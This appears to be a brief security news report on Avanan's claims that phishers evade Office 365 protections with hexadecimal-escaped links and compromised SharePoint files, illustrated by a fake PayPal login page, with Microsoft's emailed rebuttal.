Researchers from cloud security company Avanan have reported finding two ways that phishers are evading Microsoft Office 365 Security protections: one using "hexidecimal escape characters" to conceal coding and links, and the other by compromising SharePoint files.
In one recent example, Avanan came across a phishing email, purportedly sent by PayPal, that displayed a fraudulent login page, asking for account information such as name, address, phone number and password. By entering the information and clicking a submit button, the recipient unknowingly transmits his or her information to the cybercriminals.
Avanan reports that these emails are good at evading detection because their malicious links are hidden, the fake login-page is locally produced, and sandbox technologies generally don't consider HTML files with a submit button as suspicious.
Avanan claims that the phishing emails elude detection because Microsoft assumes SharePoint files are safe, as Microsoft originally developed the application. "Most people would assume that files on SharePoint and OneDrive would be scanned for malware, but the fact is that the scanning tools Microsoft uses for Office 365 are not used for files within SharePoint and OneDrive files. Even if the malware is identified once, the same file in a different location in SharePoint will not be blocked," Avanan has reported.
“We disagree with Avanan's claims," said a Microsoft spokesperson in a statement emailed to SC Media. "Microsoft's filters do not rely on the specific techniques described in the vendor post, and our solutions regularly detect and flag these kinds of attacks. In addition, we always encourage customers to use caution when clicking on links and opening emails from unknown senders.”
Avanan suspects that Chinese cybercriminals may be behind the SharePoint operation, due to use of a malicious domain that was registered this week from China.